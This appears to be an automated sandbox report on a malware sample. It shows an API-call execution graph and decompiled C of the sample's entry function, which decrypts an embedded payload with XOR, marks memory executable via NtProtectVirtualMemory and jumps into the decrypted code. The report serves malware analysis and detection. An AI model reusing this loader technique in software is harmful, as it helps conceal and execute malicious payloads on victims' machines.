                                                                                                                          Execution Coverage:5.1%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:3.4%
                                                                                                                          Total number of Nodes:617
                                                                                                                          Total number of Limit Nodes:78
                                                                                                                          execution_graph 26359 4014e9 26360 4014f0 NtProtectVirtualMemory 26359->26360 26362 401570 26360->26362 26365 422e97 26362->26365 26368 41f577 26365->26368 26369 41f59d 26368->26369 26382 40b327 26369->26382 26371 41f5a9 26372 40157b 26371->26372 26390 40f567 26371->26390 26374 41f5be 26375 41f5d1 26374->26375 26402 40f527 26374->26402 26378 41f5e6 26375->26378 26443 41e207 26375->26443 26407 40d157 26378->26407 26380 41f5f5 26381 41e207 2 API calls 26380->26381 26381->26372 26446 40b277 26382->26446 26384 40b334 26385 40b33b 26384->26385 26458 40b217 26384->26458 26385->26371 26391 40f593 26390->26391 26851 40c7d7 26391->26851 26393 40f5a5 26855 40f437 26393->26855 26396 40f5c0 26399 40f5cb 26396->26399 26400 41dfe7 2 API calls 26396->26400 26397 40f5d8 26398 40f5e9 26397->26398 26401 41dfe7 2 API calls 26397->26401 26398->26374 26399->26374 26400->26399 26401->26398 26403 418a77 LdrLoadDll 26402->26403 26404 40f546 26403->26404 26405 40f54d 26404->26405 26406 40f54f GetUserGeoID 26404->26406 26405->26375 26406->26375 26408 40d160 26407->26408 26409 40c7d7 LdrLoadDll 26408->26409 26410 40d1d3 26409->26410 26871 40c457 26410->26871 26412 40d44a 26412->26380 26413 40d1f9 26413->26412 26880 417f97 26413->26880 26415 40d23e 26415->26412 26883 409517 26415->26883 26417 40d282 26417->26412 26905 41e057 26417->26905 26421 40d2d8 26422 40d2df 26421->26422 26915 41db67 26421->26915 26424 41fa77 2 API calls 26422->26424 26425 40d2ec 26424->26425 26425->26380 26427 40d329 26428 41fa77 2 API calls 26427->26428 26429 40d330 26428->26429 26429->26380 26430 40d339 26431 40f5f7 LdrLoadDll 26430->26431 26432 40d3ad 26431->26432 26432->26422 26433 40d3b8 26432->26433 26434 41fa77 2 API calls 26433->26434 26435 40d3dc 26434->26435 26918 41dbb7 26435->26918 26438 41db67 LdrLoadDll 26439 40d417 26438->26439 26439->26412 26921 41d977 26439->26921 26442 41e207 2 API calls 26442->26412 26444 41e226 ExitProcess 26443->26444 26445 41eb27 LdrLoadDll 26443->26445 26445->26444 26447 40b28a 26446->26447 26497 41c717 LdrLoadDll 26446->26497 26477 41c5c7 26447->26477 26450 40b29d 26450->26384 26451 40b293 26451->26450 26480 41eed7 26451->26480 26453 40b2da 26453->26450 26491 40b0b7 26453->26491 26455 40b2fa 26498 40ab17 LdrLoadDll 26455->26498 26457 40b30c 26457->26384 26459 40b231 26458->26459 26460 41f1c7 LdrLoadDll 26458->26460 26828 41f1c7 26459->26828 26460->26459 26463 41f1c7 LdrLoadDll 26464 40b258 26463->26464 26465 40f327 26464->26465 26466 40f340 26465->26466 26837 40c657 26466->26837 26468 40f353 26841 41dd37 26468->26841 26472 40f379 26476 40f3a4 26472->26476 26847 41ddb7 26472->26847 26473 41dfe7 2 API calls 26475 40b34c 26473->26475 26475->26371 26476->26473 26478 41c5dc 26477->26478 26499 41e157 LdrLoadDll 26477->26499 26478->26451 26481 41eef0 26480->26481 26500 418667 26481->26500 26483 41ef08 26484 41ef11 26483->26484 26539 41ed17 26483->26539 26484->26453 26486 41ef25 26486->26484 26556 41da57 26486->26556 26809 408907 26491->26809 26493 40b0d8 26493->26455 26494 40b0d1 26494->26493 26822 408bc7 26494->26822 26497->26447 26498->26457 26499->26478 26501 4189aa 26500->26501 26511 41867b 26500->26511 26501->26483 26504 4187ac 26565 41deb7 26504->26565 26505 41878f 26622 41dfb7 LdrLoadDll 26505->26622 26508 418799 26508->26483 26509 4187d3 26510 41fa77 2 API calls 26509->26510 26514 4187df 26510->26514 26511->26501 26562 41d7a7 26511->26562 26512 41896e 26515 41dfe7 2 API calls 26512->26515 26513 418984 26631 418387 LdrLoadDll NtReadFile NtClose 26513->26631 26514->26508 26514->26512 26514->26513 26519 418877 26514->26519 26516 418975 26515->26516 26516->26483 26518 418997 26518->26483 26520 4188de 26519->26520 26522 418886 26519->26522 26520->26512 26521 4188f1 26520->26521 26624 41de37 26521->26624 26524 41888b 26522->26524 26525 41889f 26522->26525 26623 418247 LdrLoadDll NtClose 26524->26623 26527 4188a4 26525->26527 26528 4188bc 26525->26528 26568 4182e7 26527->26568 26528->26516 26580 418007 26528->26580 26530 418895 26530->26483 26533 418951 26628 41dfe7 26533->26628 26534 4188b2 26534->26483 26537 4188d4 26537->26483 26538 41895d 26538->26483 26540 41ed32 26539->26540 26541 41ed44 26540->26541 26659 41f9f7 26540->26659 26541->26486 26543 41ed64 26662 417c57 26543->26662 26545 41ed87 26545->26541 26546 417c57 3 API calls 26545->26546 26548 41eda9 26546->26548 26548->26541 26687 418fb7 26548->26687 26549 41ee31 26550 41ee41 26549->26550 26780 41eaa7 LdrLoadDll 26549->26780 26698 41e917 26550->26698 26553 41ee6f 26777 41da17 26553->26777 26557 41eb27 LdrLoadDll 26556->26557 26558 41da73 26557->26558 26559 41fa77 26558->26559 26806 41e1c7 26559->26806 26561 41ef80 26561->26453 26563 418760 26562->26563 26632 41eb27 26562->26632 26563->26504 26563->26505 26563->26508 26566 41ded3 NtCreateFile 26565->26566 26567 41eb27 LdrLoadDll 26565->26567 26566->26509 26567->26566 26569 418303 26568->26569 26570 41de37 LdrLoadDll 26569->26570 26571 418324 26570->26571 26572 41832b 26571->26572 26573 41833f 26571->26573 26575 41dfe7 2 API calls 26572->26575 26574 41dfe7 2 API calls 26573->26574 26576 418348 26574->26576 26577 418334 26575->26577 26642 41fb97 LdrLoadDll RtlAllocateHeap 26576->26642 26577->26534 26579 418353 26579->26534 26581 418052 26580->26581 26582 418085 26580->26582 26583 41de37 LdrLoadDll 26581->26583 26584 4181d0 26582->26584 26588 4180a1 26582->26588 26585 41806d 26583->26585 26586 41de37 LdrLoadDll 26584->26586 26587 41dfe7 2 API calls 26585->26587 26592 4181eb 26586->26592 26589 418076 26587->26589 26590 41de37 LdrLoadDll 26588->26590 26589->26537 26591 4180bc 26590->26591 26594 4180c3 26591->26594 26595 4180d8 26591->26595 26655 41de77 LdrLoadDll 26592->26655 26597 41dfe7 2 API calls 26594->26597 26598 4180f3 26595->26598 26599 4180dd 26595->26599 26596 418225 26600 41dfe7 2 API calls 26596->26600 26601 4180cc 26597->26601 26607 4180f8 26598->26607 26643 41fb57 26598->26643 26602 41dfe7 2 API calls 26599->26602 26604 418230 26600->26604 26601->26537 26603 4180e6 26602->26603 26603->26537 26604->26537 26615 41810a 26607->26615 26646 41df67 26607->26646 26608 41815e 26609 418175 26608->26609 26654 41ddf7 LdrLoadDll 26608->26654 26610 418191 26609->26610 26611 41817c 26609->26611 26614 41dfe7 2 API calls 26610->26614 26613 41dfe7 2 API calls 26611->26613 26613->26615 26616 41819a 26614->26616 26615->26537 26617 4181c6 26616->26617 26649 41f877 26616->26649 26617->26537 26619 4181b1 26620 41fa77 2 API calls 26619->26620 26621 4181ba 26620->26621 26621->26537 26622->26508 26623->26530 26625 418939 26624->26625 26626 41eb27 LdrLoadDll 26624->26626 26627 41de77 LdrLoadDll 26625->26627 26626->26625 26627->26533 26629 41e003 NtClose 26628->26629 26630 41eb27 LdrLoadDll 26628->26630 26629->26538 26630->26629 26631->26518 26633 41ebac 26632->26633 26635 41eb36 26632->26635 26633->26563 26635->26633 26636 418a77 26635->26636 26637 418a85 26636->26637 26638 418a91 26636->26638 26637->26638 26641 418ef7 LdrLoadDll 26637->26641 26638->26633 26640 418be3 26640->26633 26641->26640 26642->26579 26656 41e187 26643->26656 26645 41fb6f 26645->26607 26647 41df83 NtReadFile 26646->26647 26648 41eb27 LdrLoadDll 26646->26648 26647->26608 26648->26647 26650 41f89b 26649->26650 26651 41f884 26649->26651 26650->26619 26651->26650 26652 41fb57 2 API calls 26651->26652 26653 41f8b2 26652->26653 26653->26619 26654->26609 26655->26596 26657 41eb27 LdrLoadDll 26656->26657 26658 41e1a3 RtlAllocateHeap 26657->26658 26658->26645 26660 41fa24 26659->26660 26781 41e097 26659->26781 26660->26543 26663 417c68 26662->26663 26664 417c70 26662->26664 26663->26545 26686 417f43 26664->26686 26784 420b37 26664->26784 26666 417cc4 26667 420b37 2 API calls 26666->26667 26670 417ccf 26667->26670 26668 417d1d 26671 420b37 2 API calls 26668->26671 26670->26668 26789 420bd7 26670->26789 26672 417d31 26671->26672 26673 420b37 2 API calls 26672->26673 26675 417da4 26673->26675 26674 420b37 2 API calls 26683 417dec 26674->26683 26675->26674 26677 417f1b 26796 420b97 LdrLoadDll RtlFreeHeap 26677->26796 26679 417f25 26797 420b97 LdrLoadDll RtlFreeHeap 26679->26797 26681 417f2f 26798 420b97 LdrLoadDll RtlFreeHeap 26681->26798 26795 420b97 LdrLoadDll RtlFreeHeap 26683->26795 26684 417f39 26799 420b97 LdrLoadDll RtlFreeHeap 26684->26799 26686->26545 26688 418fc8 26687->26688 26689 418667 6 API calls 26688->26689 26691 418fde 26689->26691 26690 418fe7 26690->26549 26691->26690 26692 41901e 26691->26692 26695 41906a 26691->26695 26693 41fa77 2 API calls 26692->26693 26694 41902f 26693->26694 26694->26549 26696 41fa77 2 API calls 26695->26696 26697 41906f 26696->26697 26697->26549 26699 41e92b 26698->26699 26700 41e7a7 LdrLoadDll 26698->26700 26800 41e7a7 26699->26800 26700->26699 26702 41e934 26703 41e7a7 LdrLoadDll 26702->26703 26704 41e93d 26703->26704 26705 41e7a7 LdrLoadDll 26704->26705 26706 41e946 26705->26706 26707 41e7a7 LdrLoadDll 26706->26707 26708 41e94f 26707->26708 26709 41e7a7 LdrLoadDll 26708->26709 26710 41e958 26709->26710 26711 41e7a7 LdrLoadDll 26710->26711 26712 41e964 26711->26712 26713 41e7a7 LdrLoadDll 26712->26713 26714 41e96d 26713->26714 26715 41e7a7 LdrLoadDll 26714->26715 26716 41e976 26715->26716 26717 41e7a7 LdrLoadDll 26716->26717 26718 41e97f 26717->26718 26719 41e7a7 LdrLoadDll 26718->26719 26720 41e988 26719->26720 26721 41e7a7 LdrLoadDll 26720->26721 26722 41e991 26721->26722 26723 41e7a7 LdrLoadDll 26722->26723 26724 41e99d 26723->26724 26725 41e7a7 LdrLoadDll 26724->26725 26726 41e9a6 26725->26726 26727 41e7a7 LdrLoadDll 26726->26727 26728 41e9af 26727->26728 26729 41e7a7 LdrLoadDll 26728->26729 26730 41e9b8 26729->26730 26731 41e7a7 LdrLoadDll 26730->26731 26732 41e9c1 26731->26732 26733 41e7a7 LdrLoadDll 26732->26733 26734 41e9ca 26733->26734 26735 41e7a7 LdrLoadDll 26734->26735 26736 41e9d6 26735->26736 26737 41e7a7 LdrLoadDll 26736->26737 26738 41e9df 26737->26738 26739 41e7a7 LdrLoadDll 26738->26739 26740 41e9e8 26739->26740 26741 41e7a7 LdrLoadDll 26740->26741 26742 41e9f1 26741->26742 26743 41e7a7 LdrLoadDll 26742->26743 26744 41e9fa 26743->26744 26745 41e7a7 LdrLoadDll 26744->26745 26746 41ea03 26745->26746 26747 41e7a7 LdrLoadDll 26746->26747 26748 41ea0f 26747->26748 26749 41e7a7 LdrLoadDll 26748->26749 26750 41ea18 26749->26750 26751 41e7a7 LdrLoadDll 26750->26751 26752 41ea21 26751->26752 26753 41e7a7 LdrLoadDll 26752->26753 26754 41ea2a 26753->26754 26755 41e7a7 LdrLoadDll 26754->26755 26756 41ea33 26755->26756 26757 41e7a7 LdrLoadDll 26756->26757 26758 41ea3c 26757->26758 26759 41e7a7 LdrLoadDll 26758->26759 26760 41ea48 26759->26760 26761 41e7a7 LdrLoadDll 26760->26761 26762 41ea51 26761->26762 26763 41e7a7 LdrLoadDll 26762->26763 26764 41ea5a 26763->26764 26765 41e7a7 LdrLoadDll 26764->26765 26766 41ea63 26765->26766 26767 41e7a7 LdrLoadDll 26766->26767 26768 41ea6c 26767->26768 26769 41e7a7 LdrLoadDll 26768->26769 26770 41ea75 26769->26770 26771 41e7a7 LdrLoadDll 26770->26771 26772 41ea81 26771->26772 26773 41e7a7 LdrLoadDll 26772->26773 26774 41ea8a 26773->26774 26775 41e7a7 LdrLoadDll 26774->26775 26776 41ea93 26775->26776 26776->26553 26778 41eb27 LdrLoadDll 26777->26778 26779 41da33 26778->26779 26779->26486 26780->26550 26782 41eb27 LdrLoadDll 26781->26782 26783 41e0b3 NtAllocateVirtualMemory 26782->26783 26783->26660 26785 420b47 26784->26785 26786 420b4d 26784->26786 26785->26666 26787 41fb57 2 API calls 26786->26787 26788 420b73 26787->26788 26788->26666 26790 420bde 26789->26790 26791 41fb57 2 API calls 26790->26791 26793 420c34 26790->26793 26792 420c11 26791->26792 26794 41fa77 2 API calls 26792->26794 26793->26670 26794->26793 26795->26677 26796->26679 26797->26681 26798->26684 26799->26686 26801 41e7c2 26800->26801 26802 418a77 LdrLoadDll 26801->26802 26803 41e7e2 26802->26803 26804 418a77 LdrLoadDll 26803->26804 26805 41e896 26803->26805 26804->26805 26805->26702 26807 41eb27 LdrLoadDll 26806->26807 26808 41e1e3 RtlFreeHeap 26807->26808 26808->26561 26810 408912 26809->26810 26811 408917 26809->26811 26810->26494 26812 41f9f7 2 API calls 26811->26812 26815 40893c 26812->26815 26813 40899f 26813->26494 26814 41da17 LdrLoadDll 26814->26815 26815->26813 26815->26814 26816 4089a5 26815->26816 26820 41f9f7 2 API calls 26815->26820 26825 41e117 26815->26825 26818 4089cb 26816->26818 26819 41e117 LdrLoadDll 26816->26819 26818->26494 26821 4089bc 26819->26821 26820->26815 26821->26494 26823 41e117 LdrLoadDll 26822->26823 26824 408be5 26823->26824 26824->26455 26826 41eb27 LdrLoadDll 26825->26826 26827 41e133 26826->26827 26827->26815 26829 41f1ea 26828->26829 26832 40c307 26829->26832 26831 40b242 26831->26463 26834 40c32b 26832->26834 26833 40c332 26833->26831 26834->26833 26835 40c367 LdrLoadDll 26834->26835 26836 40c37e 26834->26836 26835->26836 26836->26831 26839 40c67a 26837->26839 26838 40c6f7 26838->26468 26839->26838 26850 41d7e7 LdrLoadDll 26839->26850 26842 41eb27 LdrLoadDll 26841->26842 26843 40f362 26842->26843 26843->26475 26844 41e327 26843->26844 26845 41eb27 LdrLoadDll 26844->26845 26846 41e346 LookupPrivilegeValueW 26845->26846 26846->26472 26848 41eb27 LdrLoadDll 26847->26848 26849 41ddd3 26848->26849 26849->26476 26850->26838 26852 40c7fe 26851->26852 26853 40c657 LdrLoadDll 26852->26853 26854 40c861 26853->26854 26854->26393 26856 40f451 26855->26856 26864 40f507 26855->26864 26857 40c657 LdrLoadDll 26856->26857 26858 40f473 26857->26858 26865 41da97 26858->26865 26860 40f4b5 26868 41dad7 26860->26868 26863 41dfe7 2 API calls 26863->26864 26864->26396 26864->26397 26866 41eb27 LdrLoadDll 26865->26866 26867 41dab3 26865->26867 26866->26867 26867->26860 26869 41eb27 LdrLoadDll 26868->26869 26870 40f4fb 26869->26870 26870->26863 26872 40c464 26871->26872 26873 40c468 26871->26873 26872->26413 26874 40c4b3 26873->26874 26876 40c481 26873->26876 26925 41d827 LdrLoadDll 26874->26925 26924 41d827 LdrLoadDll 26876->26924 26877 40c4c4 26877->26413 26879 40c4a3 26879->26413 26881 40f5f7 LdrLoadDll 26880->26881 26882 417fbd 26881->26882 26882->26415 26926 409747 26883->26926 26885 40973d 26885->26417 26886 409535 26886->26885 26887 409613 26886->26887 26888 408907 2 API calls 26886->26888 26887->26885 26889 408907 2 API calls 26887->26889 26904 4096f3 26887->26904 26893 409573 26888->26893 26895 409650 26889->26895 26891 409707 26891->26885 26974 40f867 6 API calls 26891->26974 26893->26887 26899 409609 26893->26899 26940 4091f7 26893->26940 26894 40971d 26894->26885 26975 40f867 6 API calls 26894->26975 26901 4091f7 8 API calls 26895->26901 26902 4096e9 26895->26902 26895->26904 26897 409733 26897->26417 26900 408bc7 LdrLoadDll 26899->26900 26900->26887 26901->26895 26903 408bc7 LdrLoadDll 26902->26903 26903->26904 26904->26885 26973 40f867 6 API calls 26904->26973 26906 41eb27 LdrLoadDll 26905->26906 26907 40d2b9 26906->26907 26908 40f5f7 26907->26908 26909 40f614 26908->26909 27105 41db17 26909->27105 26912 40f65c 26912->26421 26913 41db67 LdrLoadDll 26914 40f685 26913->26914 26914->26421 26916 40d31c 26915->26916 26917 41eb27 LdrLoadDll 26915->26917 26916->26427 26916->26430 26917->26916 26919 41eb27 LdrLoadDll 26918->26919 26920 40d3f0 26919->26920 26920->26438 26922 41eb27 LdrLoadDll 26921->26922 26923 40d443 26922->26923 26923->26442 26924->26879 26925->26877 26927 40976e 26926->26927 26928 408907 2 API calls 26927->26928 26935 4099c3 26927->26935 26929 4097c1 26928->26929 26930 408bc7 LdrLoadDll 26929->26930 26929->26935 26931 409850 26930->26931 26932 408907 2 API calls 26931->26932 26931->26935 26933 409865 26932->26933 26934 408bc7 LdrLoadDll 26933->26934 26933->26935 26938 4098c5 26934->26938 26935->26886 26936 408907 2 API calls 26936->26938 26937 4091f7 8 API calls 26937->26938 26938->26935 26938->26936 26938->26937 26939 408bc7 LdrLoadDll 26938->26939 26939->26938 26941 40921c 26940->26941 26976 41d867 26941->26976 26944 409270 26944->26893 26945 4092f1 27011 40f747 LdrLoadDll NtClose 26945->27011 26946 41da57 LdrLoadDll 26947 409294 26946->26947 26947->26945 26949 40929f 26947->26949 26951 40931d 26949->26951 26979 40d457 26949->26979 26950 40930c 26952 409313 26950->26952 26953 409329 26950->26953 26951->26893 26955 41dfe7 2 API calls 26952->26955 27012 41d8e7 LdrLoadDll 26953->27012 26955->26951 26956 4092b9 26956->26951 26999 409027 26956->26999 26958 409354 26960 40d457 2 API calls 26958->26960 26962 409374 26960->26962 26962->26951 27013 41d917 LdrLoadDll 26962->27013 26964 409399 27014 41d9a7 LdrLoadDll 26964->27014 26966 4093b3 26967 41d977 LdrLoadDll 26966->26967 26968 4093c2 26967->26968 26969 41dfe7 2 API calls 26968->26969 26970 4093cc 26969->26970 27015 408df7 26970->27015 26972 4093e0 26972->26893 26973->26891 26974->26894 26975->26897 26977 41eb27 LdrLoadDll 26976->26977 26978 409266 26977->26978 26978->26944 26978->26945 26978->26946 26980 40d482 26979->26980 26981 40f5f7 LdrLoadDll 26980->26981 26982 40d4e1 26981->26982 26983 40d52a 26982->26983 26984 41db67 LdrLoadDll 26982->26984 26983->26956 26985 40d50c 26984->26985 26986 40d513 26985->26986 26989 40d536 26985->26989 26987 41dbb7 LdrLoadDll 26986->26987 26988 40d520 26987->26988 26990 41dfe7 2 API calls 26988->26990 26991 40d5a0 26989->26991 26992 40d580 26989->26992 26990->26983 26994 41dbb7 LdrLoadDll 26991->26994 26993 41dfe7 2 API calls 26992->26993 26995 40d58d 26993->26995 26996 40d5b2 26994->26996 26995->26956 26997 41dfe7 2 API calls 26996->26997 26998 40d5bc 26997->26998 26998->26956 27000 40903d 26999->27000 27031 41d387 27000->27031 27002 409056 27007 4091c8 27002->27007 27052 408c07 27002->27052 27004 40913c 27005 408df7 7 API calls 27004->27005 27004->27007 27006 40916a 27005->27006 27006->27007 27008 41da57 LdrLoadDll 27006->27008 27007->26893 27009 40919f 27008->27009 27009->27007 27010 41e057 LdrLoadDll 27009->27010 27010->27007 27011->26950 27012->26958 27013->26964 27014->26966 27016 408e20 27015->27016 27087 408d67 27016->27087 27019 41e057 LdrLoadDll 27020 408e33 27019->27020 27020->27019 27021 408ebe 27020->27021 27024 408eb9 27020->27024 27095 40f7c7 27020->27095 27021->26972 27022 41dfe7 2 API calls 27023 408ef1 27022->27023 27023->27021 27025 41d867 LdrLoadDll 27023->27025 27024->27022 27026 408f56 27025->27026 27026->27021 27099 41d8a7 27026->27099 27028 408fba 27028->27021 27029 418667 6 API calls 27028->27029 27030 40900f 27029->27030 27030->26972 27032 41fb57 2 API calls 27031->27032 27033 41d39e 27032->27033 27059 40a957 27033->27059 27035 41d3b9 27036 41d3da 27035->27036 27037 41d3ee 27035->27037 27038 41fa77 2 API calls 27036->27038 27039 41f9f7 2 API calls 27037->27039 27040 41d3e4 27038->27040 27041 41d455 27039->27041 27040->27002 27042 41f9f7 2 API calls 27041->27042 27043 41d46e 27042->27043 27047 41d739 27043->27047 27065 41fa37 27043->27065 27046 41d725 27048 41fa77 2 API calls 27046->27048 27050 41fa77 2 API calls 27047->27050 27049 41d72f 27048->27049 27049->27002 27051 41d78e 27050->27051 27051->27002 27053 408d06 27052->27053 27054 408c1c 27052->27054 27053->27004 27054->27053 27055 418667 6 API calls 27054->27055 27056 408c89 27055->27056 27057 41fa77 2 API calls 27056->27057 27058 408cb0 27056->27058 27057->27058 27058->27004 27060 40a97c 27059->27060 27061 40c307 LdrLoadDll 27060->27061 27062 40a9af 27061->27062 27063 40a9d4 27062->27063 27068 40de87 27062->27068 27063->27035 27083 41e0d7 27065->27083 27069 40deb3 27068->27069 27070 41dd37 LdrLoadDll 27069->27070 27071 40decc 27070->27071 27072 40ded3 27071->27072 27079 41dd77 27071->27079 27072->27063 27076 40df0e 27077 41dfe7 2 API calls 27076->27077 27078 40df31 27077->27078 27078->27063 27080 40def6 27079->27080 27081 41eb27 LdrLoadDll 27079->27081 27080->27072 27082 41e367 LdrLoadDll 27080->27082 27081->27080 27082->27076 27084 41e0e0 27083->27084 27085 41eb27 LdrLoadDll 27084->27085 27086 41d71e 27085->27086 27086->27046 27086->27047 27088 408d7f 27087->27088 27089 40c307 LdrLoadDll 27088->27089 27090 408d9a 27089->27090 27091 418a77 LdrLoadDll 27090->27091 27092 408daa 27091->27092 27093 408db3 PostThreadMessageW 27092->27093 27094 408dc7 27092->27094 27093->27094 27094->27020 27096 40f7da 27095->27096 27102 41d9e7 27096->27102 27100 41eb27 LdrLoadDll 27099->27100 27101 41d8c3 27100->27101 27101->27028 27103 41eb27 LdrLoadDll 27102->27103 27104 40f805 27103->27104 27104->27020 27106 41eb27 LdrLoadDll 27105->27106 27107 40f655 27106->27107 27107->26912 27107->26913

                                                                                                                          Executed Functions

                                                                                                                          Function 004012B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182nativeCOMMONCrypto
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 48%
                                                                                                                          			_entry_(void* __eflags) {
				intOrPtr _v8;
				short _v14;
				long _v16;
				short _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v45;
				short _v47;
				long _v51;
				short _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v80;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v93;
				short _v95;
				long _v99;
				short _v100;
				short _v104;
				signed int _v108;
				char _v116;
				char _v124;
				char _v125;
				char _v126;
				signed int _v128;
				long _v132;
				long _v136;
				short _v138;
				short _v142;
				char _v160;
				char _v172;
				void* __ebx;
				void* _t94;
				void* _t106;
				void* _t119;
				signed int _t121;
				void* _t127;
				void* _t133;
				void* _t142;

				_t142 = __eflags;
				_t116 = _t133;
				_v8 =  *((intOrPtr*)(_t133 + 4));
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x67], xmm0");
				asm("movq [ebp-0x5f], xmm0");
				asm("movq [ebp-0x6f], xmm0");
				asm("movq [ebp-0x37], xmm0");
				asm("movq [ebp-0x2f], xmm0");
				asm("movdqa [ebp-0x70], xmm0");
				asm("movq [ebp-0x3f], xmm0");
				asm("movq [ebp-0x9c], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v92 = 0x97db1246;
				_v88 = 0x780bb53b;
				asm("movq xmm0, [ebp-0x50]");
				asm("movq [ebp-0x70], xmm0");
				asm("xorps xmm0, xmm0");
				_v116 = 0xab;
				asm("movdqa [ebp-0x40], xmm0");
				asm("movq [ebp-0x30], xmm0");
				_v44 = 0x28a12b7b;
				asm("movq [ebp-0xc], xmm0");
				_v40 = 0x7e030525;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x40], xmm0");
				_v72 = _v72 ^ 0x00f5c03a;
				_v76 = _v44 ^ 0x00f5c03a;
				_v28 = 0x5863f7bd;
				_v36 = 0x4006a06f;
				_v32 = 0x887972f1;
				asm("movq xmm0, [ebp-0x18]");
				asm("movq [ebp-0x38], xmm0");
				_v68 = _v68 ^ 0x00f5c03a;
				_v64 = _v64 ^ 0x00f5c03a;
				_v99 = 0;
				_v51 = 0;
				_v172 = 0;
				_v95 = 0;
				_v93 = 0;
				_v47 = 0;
				_v45 = 0;
				_v100 = 0;
				_v52 = 0;
				_v16 = 0;
				_v60 = _v28 ^ 0x00f5c03a;
				E004016B0(_t133,  &_v124, 9,  &_v76);
				_v160 = 0;
				_v142 = 0;
				_v138 = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x92], xmm0");
				asm("movq [ebp-0x8a], xmm0");
				E00401260( &_v160,  &_v124);
				_t94 = E00401190(_t142,  &_v160);
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v100 = 0;
				E004016B0(_t133,  &_v124, 0xa,  &_v76);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v28 = 0xc602de1;
				_v108 = _v28;
				_v24 = 0x32eb;
				asm("movdqa [ebp-0x70], xmm0");
				_v104 = _v24;
				asm("movq [ebp-0xa], xmm0");
				_v44 = 0x1d7396f2;
				_v40 = 0x73967f34;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x70], xmm0");
				_v36 = 0xde4dcb13;
				_v32 = 0x7c3b5622;
				asm("movq xmm0, [ebp-0x18]");
				_v100 = 0;
				_v14 = 0;
				asm("movq [ebp-0x68], xmm0");
				E004016B0(_t116,  &_v124, 0x16,  &_v76);
				E004010A0( &_v172, _t94,  &_v124, 0, 0);
				_v80 = 0;
				_t106 = E00401730();
				_t119 = 0;
				while(1) {
					_t121 =  *(_t119 + _t106) ^ 0x07a32715;
					_v128 = _t121;
					if(_t121 == 0xa8 && _t121 == 0x8d && _v126 == 0xdb && _v125 == 0xcd) {
						break;
					}
					_t119 = _t119 + 1;
					if(_t119 < 0x4000) {
						continue;
					} else {
						_t127 = _v80;
					}
					L7:
					_v132 = 0;
					_v136 = 0x2ca00;
					NtProtectVirtualMemory(0xffffffff,  &_v80,  &_v136, 0x40,  &_v132); // executed
					_v76 = _v76 ^ 0x07a32715;
					_v72 = _v72 ^ 0x07a32715;
					_v68 = _v68 ^ 0x07a32715;
					_v64 = _v64 ^ 0x07a32715;
					_v60 = _v60 ^ 0x07a32715;
					E004016B0(_t116, _t127, 0x2ca00,  &_v76);
					_t80 = _t127 + 0x21760; // 0x21760, executed
					 *_t80(); // executed
					return 0;
				}
				_t127 = _t119 + _t106;
				_v80 = _t127;
				goto L7;
			}

















































                                                                                                                          0x004012b0
                                                                                                                          0x004012b1
                                                                                                                          0x004012c0
                                                                                                                          0x004012ce
                                                                                                                          0x004012d1
                                                                                                                          0x004012d6
                                                                                                                          0x004012db
                                                                                                                          0x004012e0
                                                                                                                          0x004012e5
                                                                                                                          0x004012ea
                                                                                                                          0x004012ef
                                                                                                                          0x004012f4
                                                                                                                          0x004012fc
                                                                                                                          0x00401301
                                                                                                                          0x00401308
                                                                                                                          0x0040130f
                                                                                                                          0x00401314
                                                                                                                          0x00401319
                                                                                                                          0x0040131e
                                                                                                                          0x00401321
                                                                                                                          0x00401326
                                                                                                                          0x0040132b
                                                                                                                          0x00401335
                                                                                                                          0x0040133f
                                                                                                                          0x00401346
                                                                                                                          0x0040134b
                                                                                                                          0x00401350
                                                                                                                          0x00401357
                                                                                                                          0x0040135e
                                                                                                                          0x00401368
                                                                                                                          0x0040136f
                                                                                                                          0x00401376
                                                                                                                          0x0040137e
                                                                                                                          0x00401383
                                                                                                                          0x0040138a
                                                                                                                          0x00401399
                                                                                                                          0x004013a0
                                                                                                                          0x004013a8
                                                                                                                          0x004013b2
                                                                                                                          0x004013b8
                                                                                                                          0x004013bc
                                                                                                                          0x004013c2
                                                                                                                          0x004013c6
                                                                                                                          0x004013cc
                                                                                                                          0x004013d2
                                                                                                                          0x004013d9
                                                                                                                          0x004013dc
                                                                                                                          0x004013e3
                                                                                                                          0x004013ea
                                                                                                                          0x004013f0
                                                                                                                          0x004013f8
                                                                                                                          0x00401402
                                                                                                                          0x0040140a
                                                                                                                          0x00401412
                                                                                                                          0x0040141e
                                                                                                                          0x00401429
                                                                                                                          0x00401431
                                                                                                                          0x00401436
                                                                                                                          0x0040143b
                                                                                                                          0x00401442
                                                                                                                          0x00401447
                                                                                                                          0x0040144a
                                                                                                                          0x0040144f
                                                                                                                          0x00401459
                                                                                                                          0x0040145c
                                                                                                                          0x00401466
                                                                                                                          0x0040146b
                                                                                                                          0x0040146f
                                                                                                                          0x00401478
                                                                                                                          0x0040147f
                                                                                                                          0x00401486
                                                                                                                          0x0040148b
                                                                                                                          0x00401493
                                                                                                                          0x0040149a
                                                                                                                          0x004014a1
                                                                                                                          0x004014a9
                                                                                                                          0x004014af
                                                                                                                          0x004014b5
                                                                                                                          0x004014ba
                                                                                                                          0x004014cf
                                                                                                                          0x004014d9
                                                                                                                          0x004014e0
                                                                                                                          0x004014e5
                                                                                                                          0x004014f0
                                                                                                                          0x004014f3
                                                                                                                          0x004014f9
                                                                                                                          0x004014ff
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00401512
                                                                                                                          0x00401519
                                                                                                                          0x00000000
                                                                                                                          0x0040151b
                                                                                                                          0x0040151b
                                                                                                                          0x0040151b
                                                                                                                          0x0040151e
